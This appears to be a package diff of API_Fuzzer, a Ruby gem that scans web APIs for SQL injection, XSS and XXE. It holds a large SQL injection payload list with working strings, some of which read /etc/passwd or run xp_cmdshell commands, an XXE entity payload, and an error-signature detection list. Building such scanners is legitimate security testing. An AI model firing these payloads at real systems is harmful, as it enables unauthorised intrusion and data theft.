API_Fuzzer 0.1.1

data/lib/API_Fuzzer/sql_check.rb

@@ -0,0 +1,156 @@
+require 'API_Fuzzer/vulnerability'
+require 'API_Fuzzer/error'
+require 'API_Fuzzer/request'
+
+module API_Fuzzer
+  class InvalidURLError < StandardError; end
+
+  class SqlCheck
+    attr_accessor :parameters
+    attr_accessor :payloads, :sql_errors
+
+    ALLOWED_METHODS = [:get, :post].freeze
+    PAYLOAD_PATH = File.expand_path('../../../payloads/sql.txt', __FILE__)
+    DETECT_PATH = File.expand_path('../../../payloads/detect/sql.txt', __FILE__)
+
+    def self.scan(options = {})
+      @payloads  = []
+      @sql_errors = []
+      fetch_payloads
+      @url = options[:url] || nil
+      raise InvalidURLError, "[ERROR] URL missing in argument" unless @url
+      @params = options[:params] || {}
+      @cookies = options[:cookies] || {}
+      @json = options[:json] || false
+      @headers = options[:headers] || {}
+      @vulnerabilities = []
+
+      fuzz_payloads
+      return @vulnerabilities.uniq { |vuln| vuln.description }
+    rescue HTTP::ConnectionError => e
+      sleep(5)
+      fuzz_payloads
+      return @vulnerabilities.uniq { |vuln| vuln.description }
+    end
+
+    def self.fuzz_payloads
+      @payloads.each do |payload|
+        fuzz_each_payload(payload)
+      end
+    end
+
+    def self.fuzz_each_payload(payload)
+      uri = URI(@url)
+      path = uri.path
+      query = uri.query
+      base_uri = query.nil? ? path : [path, query].join("?")
+      fragments = base_uri.split(/[\/,?,&]/) - ['']
+      fragments.each do |fragment|
+        if fragment.match(/\A(\w)+=(\w)*\z/)
+          url = @url.gsub(fragment, [fragment, payload].join('')).chomp
+          fuzz_each_fragment(url, payload)
+        else
+          url = @url.gsub(fragment, payload).chomp
+          fuzz_each_fragment(url, payload)
+        end
+      end
+
+      return if @params.empty?
+
+      @params.keys.each do |parameter|
+        fuzz_each_parameter(parameter, payload)
+      end
+    end
+
+    def self.fuzz_each_fragment(url, payload)
+      ALLOWED_METHODS.each  do |method|
+        begin
+          response = API_Fuzzer::Request.send_api_request(
+            url: url,
+            method: method,
+            cookies: @cookies,
+            headers: @headers
+          )
+
+          @vulnerabilities << API_Fuzzer::Error.new(description: "#{method} #{@url}", status: response.status, value: response.body) unless success?(response)
+          body = ''
+          if response_json?(response)
+            body = JSON.parse(response.body)
+          else
+            body = response.body
+          end
+
+          vulnerable = check_response?(body.to_s.downcase, payload)
+          next unless vulnerable
+          @vulnerabilities << API_Fuzzer::Vulnerability.new(
+            description: "Possible SQL injection in #{method} #{@url}",
+            parameter: "URL: #{url}",
+            value: "[PAYLOAD] #{payload}",
+            type: 'HIGH'
+          )
+        rescue Exception => e
+          puts e.message
+        end
+      end
+    end
+
+    def self.fuzz_each_parameter(parameter, payload)
+      @params[parameter] = payload
+      ALLOWED_METHODS.each do |method|
+        begin
+          response = API_Fuzzer::Request.send_api_request(
+            url: @url,
+            params: @params,
+            method: method,
+            cookies: @cookies,
+            headers: @headers
+          )
+
+          @vulnerabilities << API_Fuzzer::Error.new(description: "[ERROR] #{method} #{@url}", status: response.status, value: response.body) unless success?(response)
+          body = response.body.to_s.downcase
+          vulnerable = check_response?(body, payload)
+          next unless vulnerable
+
+          @vulnerabilities << API_Fuzzer::Vulnerability.new(
+            description: "Possible SQL injection in #{method} #{@url} parameter: #{parameter}",
+            parameter: "parameter: #{@parameter}",
+            value: "[PAYLOAD] #{payload}",
+            type: 'HIGH'
+          )
+        rescue Exception => e
+          puts e.message
+        end
+      end
+    end
+
+    def self.check_response?(body, payload)
+      @sql_errors.each do |error|
+        if body.match(error.chomp)
+          puts error
+          return true
+        end
+      end
+      false
+    end
+
+    def self.success?(response)
+      response.code == 200
+    end
+
+    def self.response_json?(response)
+      response && response.headers['Content-Type'] && response.headers['Content-Type'].downcase =~ /application\/json/
+    end
+
+    def self.fetch_payloads
+      file = File.expand_path(PAYLOAD_PATH, __FILE__)
+      File.readlines(file).each do |line|
+        @payloads << line
+      end
+
+      file = File.expand_path(DETECT_PATH, __FILE__)
+      File.readlines(file).each do |line|
+        @sql_errors << line.downcase
+      end
+    end
+  end
+end

data/lib/API_Fuzzer/version.rb

@@ -0,0 +1,3 @@
+module APIFuzzer
+  VERSION = "0.1.1".freeze
+end

data/lib/API_Fuzzer/vulnerability.rb

@@ -0,0 +1,14 @@
+module API_Fuzzer
+
+  class Vulnerability
+    attr_accessor :description, :value, :type, :parameter
+    
+    def initialize(options = {})
+      @description = options[:description]
+      @parameter = options[:parameter]
+      @value = options[:value] 
+      @type = options[:type]
+    end
+  end
+
+end

data/lib/API_Fuzzer/xss_check.rb

@@ -0,0 +1,92 @@
+require 'API_Fuzzer/vulnerability'
+require 'API_Fuzzer/error'
+require 'API_Fuzzer/request'
+
+module API_Fuzzer
+
+  class InvalidURLError < StandardError; end
+
+  class XssCheck
+    attr_accessor :parameters
+
+    ALLOWED_METHODS = [:get, :post].freeze
+    PAYLOADS = []
+    PAYLOAD_PATH = File.expand_path('../../../payloads/xss.txt', __FILE__)
+
+    def self.scan(options = {})
+      @url = options[:url] || nil
+      raise InvalidURLError, "[ERROR] URL missing in argument" unless @url
+      @params = options[:params] || {}
+      @cookies = options[:cookies] || {}
+      @headers = options[:headers] || {}
+      @json = options[:json] || false
+      @vulnerabilities = []
+
+      fetch_payloads
+      PAYLOADS.each do |payload|
+        fuzz_each_payload(payload)
+      end
+      @vulnerabilities.uniq { |vuln| vuln.description }
+    end
+
+    private
+
+    def self.fuzz_each_payload(payload)
+      @params.keys.each do |parameter|
+        fuzz_each_parameter(parameter, payload)
+      end
+    end
+
+    def self.fuzz_each_parameter(parameter, payload)
+      @params[parameter] = payload
+
+      ALLOWED_METHODS.each do |method|
+        response = API_Fuzzer::Request.send_api_request(
+          url: @url,
+          params: @params,
+          method: method,
+          cookies: @cookies,
+          headers: @headers
+        )
+
+        if response_json?(response)
+          body = JSON.parse(response.body)
+        else
+          vulnerable = check_response?(response.body, payload)
+
+          if success?(response)
+            @vulnerabilities << API_Fuzzer::Vulnerability.new(
+              description: "Possible XSS in #{method} #{@url} parameter: #{@parameter}",
+              value: "[PAYLOAD] #{payload}",
+              type: 'MEDIUM'
+            ) if vulnerable
+          else
+            API_Fuzzer::Error.new(description: "[ERROR] #{method} #{@url}", status: response.status, value: response.body)
+          end
+        end
+      end
+    end
+
+    def self.check_response?(body, payload)
+      if body.to_s.include?(payload)
+        return true
+      end
+      false
+    end
+
+    def self.success?(response)
+      response.code == 200
+    end
+
+    def self.response_json?(response)
+      response && response.headers['Content-Type'].downcase =~ /application\/json/
+    end
+
+    def self.fetch_payloads
+      file = File.expand_path(PAYLOAD_PATH, __FILE__)
+      File.readlines(file).each do |line|
+        PAYLOADS << line
+      end
+    end
+  end
+end

data/lib/API_Fuzzer/xxe_check.rb

@@ -0,0 +1,47 @@
+require 'API_Fuzzer/vulnerability'
+require 'API_Fuzzer/error'
+require 'API_Fuzzer/request'
+
+module API_Fuzzer
+  class XxeCheck
+
+    def self.scan(options = {})
+      @url = options[:url] || nil
+      @params = options[:params]
+      @scan_hash = options[:scan]
+      @cookies = options[:cookies] || {}
+      @headers = options[:headers] || {}
+      fuzz_xml_params
+    end
+
+    private
+
+    def self.fuzz_xml_params
+      return unless @params
+      body = params_serialize.gsub(/\>\s*[a-zA-Z0-9]*\s*\<\//, '>&xxe;<')
+      payload = <<-XXEPAYLOAD
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<!DOCTYPE foo [
+<!ELEMENT foo ANY >
+<!ENTITY xxe SYSTEM "http://127.0.0.1:3000/ping/#{@scan_hash}" >]>
+      XXEPAYLOAD
+      payload << body
+      API_Fuzzer::Request.send_api_request(
+        url: @url,
+        params: payload,
+        body: true,
+        method: :post,
+        headers: @headers,
+        cookies: @cookies
+      )
+    end
+
+    def self.params_serialize
+      body = []
+      @params.keys.each do |key, value|
+        body << "#{key}=#{value}"
+      end
+      body.join('&')
+    end
+  end
+end

data/payloads/blind_sql.txt

@@ -0,0 +1,3 @@
+sleep(__TIME__)#
+hi' or sleep(__TIME__)--+
+

data/payloads/detect/sql.txt

@@ -0,0 +1,89 @@
+</font><font face="Arial" size=2>
+A syntax error has occurred
+ADODB.Field error
+ASP.NET is configured to show verbose error messages
+ASP.NET_SessionId
+Active Server Pages error
+An illegal character has been found in the statement
+An unexpected token "END-OF-STATEMENT" was found
+CLI Driver
+Can't connect to local
+Custom Error Message
+DB2 Driver
+DB2 Error
+DB2 ODBC
+Died at
+Disallowed Parent Path
+Error Diagnostic Information
+Error Message : Error loading required libraries.
+Error Report
+Error converting data type varchar to numeric
+Fatal error
+Incorrect syntax near
+Index of
+Internal Server Error
+Invalid Path Character
+Invalid procedure call or argument
+Invision Power Board Database Error
+JDBC Driver
+JDBC Error
+JDBC MySQL
+JDBC Oracle
+JDBC SQL
+Microsoft OLE DB Provider for ODBC Drivers
+Microsoft VBScript compilation error
+Microsoft VBScript error
+MySQL Driver
+MySQL Error
+MySQL ODBC
+ODBC DB2
+ODBC Driver
+ODBC Error
+ODBC Microsoft Access
+ODBC Oracle
+ODBC SQL
+ODBC SQL Server
+OLE/DB provider returned message
+ORA-0
+ORA-1
+Oracle DB2
+Oracle Driver
+Oracle Error
+Oracle ODBC
+PHP Error
+PHP Parse error
+PHP Warning
+Parent Directory
+Permission denied: 'GetObject'
+PostgreSQL query failed: ERROR: parser: parse error
+SQL Server Driver
+SQL Server
+SQL command not properly ended
+SQLException
+Supplied argument is not a valid PostgreSQL result
+Syntax error in query expression
+The error occurred in
+The script whose uid is
+Type mismatch
+Unable to jump to row
+Unclosed quotation mark before the character string
+Unterminated string constant
+Warning: Cannot modify header information - headers already sent
+Warning: Supplied argument is not a valid File-Handle resource in
+Warning: mysql_query()
+Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL
+You have an error in your SQL syntax near
+data source=
+detected an internal error [IBM][CLI Driver][DB2/6000]
+include_path
+invalid query
+is not allowed to access 
+mySQL error with query
+mysql error
+on MySQL result index
+server object error
+supplied argument is not a valid MySQL result resource
+unexpected end of SQL command
+MySQL server version
+You have an error in your SQL syntax
+SQL syntax

data/payloads/sql.txt

@@ -0,0 +1,196 @@
+'
+' -- 
+(
+)
+*|
+*/*
+&
+0
+031003000270000
+0 or 1=1
+0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
+0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
+0x77616974666F722064656C61792027303A303A31302700 exec(@s)
+1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
+1 or 1=1
+1;SELECT%20*
+1 waitfor delay '0:0:10'--
+'%20or%20''='
+'%20or%201=1
+')%20or%20('x'='x
+'%20or%20'x'='x
+%20or%20x=x
+%20'sleep%2050'
+%20$(sleep%2050)
+%21
+23 OR 1=1
+hi' or '1'='1'--
+%26
+%27%20or%201=1
+%28
+%29
+%2A%28%7C%28mail%3D%2A%29%29
+%2A%28%7C%28objectclass%3D%2A%29%29
+%2A%7C
+||6
+'||'6
+(||6)
+%7C
+a'
+admin' or '
+' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
+' and 1 in (select var from temp)--
+anything' OR 'x'='x
+"a"" or 1=1--"
+a' or 1=1--
+"a"" or 3=3--"
+a' or 3=3--
+a' or 'a' = 'a
+&apos;%20OR
+as
+asc
+a' waitfor delay '0:0:10'--
+'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > 
+bfilename
+char%4039%41%2b%40SELECT
+declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
+declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
+declare @q nvarchar (4000) select @q =
+declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
+declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) 
+declare @s varchar(22) select @s =
+declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
+delete
+desc
+distinct
+'||(elt(-3+5,bin(15),ord(10),hex(char(45))))
+'; exec master..xp_cmdshell
+'; exec master..xp_cmdshell 'ping 172.10.1.255'--
+exec(@s)
+'; exec ('sel' + 'ect us' + 'er')
+exec sp
+'; execute immediate 'sel' || 'ect us' || 'er'
+exec xp
+'; exec xp_regread
+' group by userid having 1=1--
+handler
+having
+' having 1=1--
+hi or 1=1 --"
+hi' or 1=1 --
+"hi"") or (""a""=""a"
+hi or a=a
+hi' or 'a'='a
+hi') or ('a'='a
+'hi' or 'x'='x';
+insert
+like
+limit
+*(|(mail=*))
+*(|(objectclass=*))
+or
+' or ''='
+ or 0=0 #"
+' or 0=0 --
+' or 0=0 #
+" or 0=0 --
+or 0=0 --
+or 0=0 #
+' or 1 --'
+' or 1/*
+; or '1'='1'
+' or '1'='1
+' or '1'='1'--
+' or 1=1
+' or 1=1 /*
+' or 1=1--
+' or 1=1-- 
+'/**/or/**/1/**/=/**/1
+‘ or 1=1 --
+" or 1=1--
+or 1=1
+or 1=1--
+ or 1=1 or ""=
+' or 1=1 or ''='
+' or 1 in (select @@version)--
+or%201=1
+or%201=1 --
+' or 2 > 1
+' or 2 between 1 and 3
+' or 3=3
+‘ or 3=3 --
+' or '7659'='7659
+ or a=a
+ or a = a
+' or 'a'='a
+' or a=a--
+') or ('a'='a
+" or "a"="a
+) or (a=a
+order by
+' or (EXISTS)
+ or isNULL(1/0) /*
+" or isNULL(1/0) /*
+' or 'something' like 'some%'
+' or 'something' = 'some'+'thing'
+' or 'text' = n'text'
+' or 'text' > 't'
+' or uid like '%
+' or uname like '%
+' or 'unusual' = 'unusual'
+' or userid like '%
+' or user like '%
+' or username like '%
+' or username like char(37);
+' or 'whatever' in ('whatever')
+' -- &password=
+password:*/=1--
+PRINT
+PRINT @@variable
+procedure
+replace
+select
+' select * from information_schema.tables--
+' select name from syscolumns where id = (select id from sysobjects where name = tablename')--
+' (select top 1
+--sp_password
+'sqlattempt1
+(sqlattempt2)
+'sqlvuln
+'+sqlvuln
+(sqlvuln)
+sqlvuln;
+t'exec master..xp_cmdshell 'nslookup www.google.com'--
+to_timestamp_tz
+truncate
+tz_offset
+' UNION ALL SELECT
+' union all select @@version--
+' union select 
+uni/**/on sel/**/ect
+' UNION SELECT
+' union select 1,load_file('/etc/passwd'),1,1,1;
+) union select * from information_schema.tables;
+' union select * from users where login = char(114,111,111,116);
+update
+'||UTL_HTTP.REQUEST
+,@variable
+@variable
+@var select @var as var into temp end --
+\x27UNION SELECT
+x' AND 1=(SELECT COUNT(*) FROM tabname); --
+x' AND email IS NULL; --
+x' AND members.email IS NULL; --
+x' AND userid IS NULL; --
+x' or 1=1 or 'x'='y
+x' OR full_name LIKE '%Bob%
+ý or 1=1 --
+1'1
+1 exec sp_ (or exec xp_)
+1 and 1=1
+1' and 1=(select count(*) from tablenames); --
+1 or 1=1
+1' or '1'='1
+1or1=1
+1'or'1'='1
+fake@ema'or'il.nl'='il.nl